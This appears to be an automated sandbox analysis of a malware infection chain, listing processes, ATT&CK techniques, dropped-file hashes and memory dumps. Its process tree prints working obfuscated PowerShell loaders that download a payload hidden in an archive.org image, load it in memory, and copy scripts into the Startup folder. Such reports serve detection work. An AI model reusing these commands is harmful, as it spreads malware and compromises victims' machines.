wBTAFQAQQBSAFQAPgA+ADcAJwArACcASwAnACsAJwBFACcAKwAnADsAMABUAFkAZQBuAGQARgBsAGEAZwAgAD0AIAA3AEsARQA8ADwAQgBBAFMARQA2ADQAXwAnACsAJwBFAE4ARAA+AD4ANwBLACcAKwAnAEUAOwAwAFQAWQBzAHQAYQByAHQASQBuACcAKwAnAGQAZQB4ACAAPQAgADAAVABZAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAJwArACcAZQB4AE8AZgAoADAAVABZAHMAdABhAHIAdABGAGwAYQBnACkAOwAwAFQAWQBlAG4AZABJAG4AJwArACcAZABlAHgAIAAnACsAJwA9ACAAMABUAFkAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAMABUAFkAZQBuAGQARgBsAGEAZwApADsAMABUAFkAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAwAFQAWQBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgADAAVABZAHMAdABhAHIAdABJAG4AZABlAHgAOwAwAFQAJwArACcAWQBzAHQAYQByAHQASQBuAGQAZQB4ACAAJwArACcAKwA9ACAAMABUAFkAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ADAAVABZAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgADAAVABZAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAwAFQAWQBzAHQAYQByAHQASQBuAGQAZQB4ADsAJwArACcAMABUAFkAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAwAFQAJwArACcAWQBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiACcAKwAnAHMAdAByAGkAbgBnACgAMABUAFkAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAMABUAFkAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ADAAVABZAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQAnACsAJwBzACAAPQAgAFsAJwArACcAUwB5AHMAdABlAG0ALgBDAG8AbgB2ACcAKwAnAGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAwAFQAWQBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAwAFQAWQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAJwArACcAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoADAAVABZAGMAbwBtAG0AYQBuAGQAJwArACcAQgB5AHQAZQBzACkAOwAwAFQAWQB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgANwBLAEUAVgBBAEkANwBLAEUAKQA7ADAAVABZAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAwAFQAWQBuACcAKwAnAHUAbABsACwAIABAACgANwBLAEUAMAAvAFcAYwBtAEQASQAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoADcASwBFACwAIAA3AEsARQAxADcASwBFACwAIAA3AEsARQBDADoAdABiADAAUAByAG8AZwByAGEAbQBEAGEAdABhAHQAYgAwADcASwBFACwAIAAnACsAJwA3AEsARQBjAGUAcgB0AGUAaQByAGEAbQBlAG4AdABlADcASwBFACwAIAA3AEsARQBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIANwBLAEUALAAgADcASwBFAGQAZQBzAGEAdABpAHYAYQBkAG8ANwBLAEUALAAgADcASwBFAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8ANwBLAEUAKQApADsAJwApAC0AQwBSAGUAUABsAEEAQwBFACAAIAAnAHQAYgAwACcALABbAEMASABBAFIAXQA5ADIAIAAgAC0AQwBSAGUAUABsAEEAQwBFACAAKABbAEMASABBAFIAXQA1ADUAKwBbAEMASABBAFIAXQA3ADUAKwBbAEMASABBAFIAXQA2ADkAKQAsAFsAQwBIAEEAUgBdADMAOQAtAFIARQBQAGwAQQBDAGUAIAAnADAAVABZACcALABbAEMASABBAFIAXQAzADYAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $veRboSEprEFErenCe.TOStriNg()[1,3]+'X'-JoIN'')( (('0TYimageUrl = 7KEhttps'+'://ia600101.u'+'s.archive.org/1/items/detah-note-j_202410/DetahNote_J.j'+'pg 7'+'KE;0TYwebClient = New-Object System.Net.WebClient;0TYimageBytes = 0TYwebClient.Dow'+'nload'+'Data(0TYimageUrl);0TYimageText = [Syste'+'m.Text.Encoding]::UTF8.GetString(0TYimageBytes);0T'+'YstartFlag = 7KE<<B'+'ASE64_START>>7'+'K'+'E'+';0TYendFlag = 7KE<<BASE64_'+'END>>7K'+'E;0TYstartIn'+'dex = 0TYimageText.Ind'+'exOf(0TYstartFlag);0TYendIn'+'dex '+'= 0TYimageText.IndexOf(0TYendFlag);0TYstartIndex -ge 0 -and 0TYendIndex -gt 0TYstartIndex;0T'+'YstartIndex '+'+= 0TYstartFlag.Length;0TYbase64Length = 0TYendIndex - 0TYstartIndex;'+'0TYbase64Command = 0T'+'YimageText.Sub'+'string(0TYstartIndex, 0TYbase64Length);0TYcommandByte'+'s = ['+'System.Conv'+'ert]::FromBase64String(0TYbase64Command);0TYloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(0TYcommand'+'Bytes);0TYvaiMethod = [dnlib.IO.Home].GetMethod(7KEVAI7KE);0TYvaiMethod.Invoke(0TYn'+'ull, @(7KE0/WcmDI/d/ee.etsap//:sptth7KE, 7KE17KE, 7KEC:tb0ProgramDatatb07KE, '+'7KEcerteiramente7KE, 7KEAddInProcess327KE, 7KEdesativado7KE, 7KEdesativad'+'o7KE));')-CRePlACE 'tb0',[CHAR]92 -CRePlACE ([CHAR]55+[CHAR]75+[CHAR]69),[CHAR]39-REPlACe '0TY',[CHAR]36) )"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3716
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\certeiramente.js"
        5⤵
        
        PID:2712
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:2904
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\sys64.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  PID:2236
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys64.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2340
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\sys64.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGsAZQBtAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABYAFYAaABoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAwADEAMAAxAC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAvAGkAdABlAG0AcwAvAGQAZQB0AGEAaAAtAG4AbwB0AGUALQBqAF8AMgAwADIANAAxADAALwBEACcAKwAnAGUAdABhAGgATgBvAHQAZQBfAEoALgBqAHAAZwAgAFgAVgBoADsAawBlAG0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AGsAZQBtAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAawBlAG0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuACcAKwAnAGwAbwBhAGQARABhAHQAYQAoAGsAZQBtACcAKwAnAGkAbQBhACcAKwAnAGcAZQBVAHIAbAApADsAawBlAG0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ACcAKwAnADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAawBlAG0AaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAawBlAG0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAWABWAGgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBYAFYAaAA7AGsAZQBtAGUAbgBkAEYAbABhAGcAIAA9ACAAWABWAGgAPAA8ACcAKwAnAEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AFgAVgBoADsAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACcAKwAnAD0AIABrAGUAbQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABrAGUAbQBzAHQAYQByAHQARgBsAGEAZwApADsAawBlAG0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAGsAZQBtAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAGsAZQBtAGUAbgBkAEYAbABhAGcAKQA7AGsAZQBtAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAawBlAG0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABrAGUAbQBzAHQAYQByAHQASQBuAGQAZQB4ADsAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAGsAZQBtAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBrAGUAbQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABrAGUAbQBlACcAKwAnAG4AZABJAG4AZAAnACsAJwBlAHgAIAAtACAAawBlAG0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGsAZQBtAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAawBlAG0AaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAGsAZQBtAHMAdABhAHIAdABJAG4AZABlAHgALAAgAGsAZQBtAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBrAGUAbQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AJwArACcAdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAawBlAG0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAawBlAG0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgAnACsAJwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABrAGUAbQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAnACsAJwApADsAawBlAG0AdgBhAGkATQBlAHQAaABvAGQAJwArACcAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoAFgAVgBoAFYAQQBJAFgAVgBoACkAOwBrAGUAbQB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAawBlAG0AbgB1AGwAbAAsACAAQAAoAFgAVgBoADAALwAnACsAJwBLADIAYQBZAFIALwBkAC8AZQBlACcAKwAnAC4AZQB0AHMAJwArACcAYQBwAC8ALwA6AHMAcAB0AHQAaABYAFYAaAAsACAAWABWAGgAJwArACcAMQBYAFYAaAAsACAAWABWAGgAQwA6AHcASABxAFAAcgBvAGcAcgBhAG0ARABhAHQAYQB3AEgAJwArACcAcQBYAFYAaAAsACAAWABWAGgAbABhAHQAaQBuAGEAcwBYAFYAaAAsACAAWABWAGgAQQAnACsAJwBwAHAATABhAHUAbgBjAGgAWABWAGgALAAgAFgAVgBoAGQAZQBzAGEAdAAnACsAJwBpAHYAYQBkAG8AWABWAGgALAAgAFgAVgBoAGQAZQBzAGEAdABpAHYAYQBkAG8AWABWAGgAKQApADsAJwApAC4AcgBlAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AMQAxADkAKwBbAEMAaABhAFIAXQA3ADIAKwBbAEMAaABhAFIAXQAxADEAMwApACwAWwBTAFQAUgBJAG4AZwBdAFsAQwBoAGEAUgBdADkAMgApAC4AcgBlAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AOAA4ACsAWwBDAGgAYQBSAF0AOAA2ACsAWwBDAGgAYQBSAF0AMQAwADQAKQAsAFsAUwBUAFIASQBuAGcAXQBbAEMAaABhAFIAXQAzADkAKQAuAHIAZQBQAEwAQQBjAGUAKAAnAGsAZQBtACcALAAnACQAJwApACAAfAAgAC4AIAAoACAAJABwAHMASABvAE0ARQBbADIAMQBdACsAJABQAFMASABvAE0ARQBbADMANABdACsAJwB4ACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('kemimageUrl = XVhhttps://ia600101.us.archive.org/1/items/detah-note-j_202410/D'+'etahNote_J.jpg XVh;kemwebClient = New-Object System.Net.WebClient;kemimageBytes = kemwebClient.Down'+'loadData(kem'+'ima'+'geUrl);kemimageText = [System.Text.Encoding]:'+':UTF8.GetString(kemimageBytes);kemstartFlag = XVh<<BASE64_START>>XVh;kemendFlag = XVh<<'+'BASE64_END>>XVh;kemstartIndex '+'= kemimageText.IndexOf(kemstartFlag);kemendIndex = kemimageText.IndexOf(kemendFlag);kemstartIndex -ge 0 -and kemendIndex -gt kemstartIndex;kemstartIndex += kemstartFlag.Length;kembase64Length = keme'+'ndInd'+'ex - kemstartIndex;kembase64Command = kemimageText.Substring(kemstartIndex, kembase64Length);kemcommandBytes = [System.Con'+'vert]::FromBase64String(kembase64Command);kemloadedAssembly = [System.'+'Reflection.Assembly]::Load(kemcommandBytes'+');kemvaiMethod'+' = [dnlib.IO.Home].GetMethod(XVhVAIXVh);kemvaiMethod.Invoke(kemnull, @(XVh0/'+'K2aYR/d/ee'+'.ets'+'ap//:sptthXVh, XVh'+'1XVh, XVhC:wHqProgramDatawH'+'qXVh, XVhlatinasXVh, XVhA'+'ppLaunchXVh, XVhdesat'+'ivadoXVh, XVhdesativadoXVh));').rePLAce(([ChaR]119+[ChaR]72+[ChaR]113),[STRIng][ChaR]92).rePLAce(([ChaR]88+[ChaR]86+[ChaR]104),[STRIng][ChaR]39).rePLAce('kem','$') | . ( $psHoME[21]+$PSHoME[34]+'x')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3372
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\latinas.js"
        5⤵
        
        PID:3412
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:3836

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
617541213df002929260ec8e1e6db9ee

SHA1
1a0a797af47c9c9604e25374830e20bd29f34aaa

SHA256
d391c6f751b3f11bfe37a109253c1cf4978cd316453077b28a36bbf54fbbb3bb

SHA512
49376b75413376ec6bac14fb513eb5aeb8bc63525ce4aa837a6f06ea465145d7423f51d90b60112c181bfffd3b2d4d219a32a7c0fa788bcf43ea60f780dbe680

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
52ab4f7a480a7aeea37c50394cd80bd8

SHA1
6b987774d1e25b0a5fced7695ae426e0b1ca49a8

SHA256
e6e3f74213f552dcb6d7cf34043c518092d58ebb5718500f7c6e366d8700ee81

SHA512
04988e83048557867c74d5cdd41922f30f9c9fa7a0c15eadc324434ef38e9943ddee0f40c72373ed5e905c86ba8271f610968d6b077d67f574c20051409204e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
72095de40d474781748fdf7b657cbcc4

SHA1
87ff5eefe370c09c94db9ee80cc3a6397bf95918

SHA256
e6dc7486030750616328e86374d44e2159541329167a92efe3a76defb4f0259f

SHA512
18ecf4491fe5ab844c09ffcb328cebae9718fd731ae5915b1dfb1a2d2f603ae86fad0a28f8a129e4e36776ef9fb8b183a140af1c92ec771dc8681847d174159d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
6fb0065bbdec08203c0d1e661e3fe77e

SHA1
93662f28587d32e3b335e46e01fc5873f64f2378

SHA256
f11fd8c1ed0932fe474fa1b96735d781ef147412c9c61dc242ac7dd9763b34f3

SHA512
cfff88ce1a48a12bd94458e956a21f17e21b03e2a9486df5ef0e21b82bb7c92e2fbf2cf0e16b8ff94773357583552ee8e6898b222f529d2eed752cc908f011f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sek3ddg1.5hd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf

Filesize
95KB

MD5
0a38b2745ee17418757b89ed83bf67e9

SHA1
5e48606d911b66288a4635b804b23096b4153bbe

SHA256
00f9505695f17f040c9464e7b62c1eaa7e6b08e64db30a715e0826547b953730

SHA512
4b25823c795776eaa3ce488d71b39fd671d0d58ee3c942201ded7d8fd5076635c6eb96ac1a8f67e342914cb39f69444adeae1427dc5c62d29afc57ea97513766

Download Submit
C:\Users\Public\Documents\sys32.js

Filesize
3KB

MD5
bc7244aee3bf10a799a65d7f9deef0f4

SHA1
d1aa7166248c237033e2974659b9db57f2246eca

SHA256
e67d0735f544b2756fc90950c1fc094cbae7bb4cabf53f76a2d65c950b252fca

SHA512
219d57c486471c02317efcb462c4796e0af55676a5931541855f54a31af8ba4df12b5d3e019294d8cac647c9f0972ca655e03517862870846ea1c7e93dedb855

Download Submit
C:\Users\Public\Documents\sys64.js

Filesize
3KB

MD5
144898fc1178eac98ffad2048884b0bc

SHA1
af869238a636b1d0a02d48cb9683bc30cf13857c

SHA256
21832cffce9087a2dfe4a21bd1f069b06bf7cfafe87540eb09afbac8c10cb19a

SHA512
bb2a56791848acfe12960eb38f58f57a1b4785d27499c4ec888a4144e2211cb1a28bdf5e0494d457e844868e63c6a0274f42c0d49928de26f19f53742846f7fe

Download Submit
memory/2276-199-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2276-217-0x0000000006FE0000-0x0000000007584000-memory.dmp

Filesize
5.6MB

Download
memory/2276-203-0x0000000004F40000-0x0000000004FDC000-memory.dmp

Filesize
624KB

Download
memory/2276-216-0x0000000006990000-0x0000000006A22000-memory.dmp

Filesize
584KB

Download
memory/2604-54-0x000001B9A8610000-0x000001B9A8632000-memory.dmp

Filesize
136KB

Download
memory/2660-209-0x00000000051A0000-0x000000000525C000-memory.dmp

Filesize
752KB

Download
memory/2660-210-0x0000000005880000-0x0000000005E98000-memory.dmp

Filesize
6.1MB

Download
memory/2660-211-0x00000000053C0000-0x0000000005426000-memory.dmp

Filesize
408KB

Download
memory/2660-204-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/3716-196-0x00000247FC910000-0x00000247FCB30000-memory.dmp

Filesize
2.1MB

Download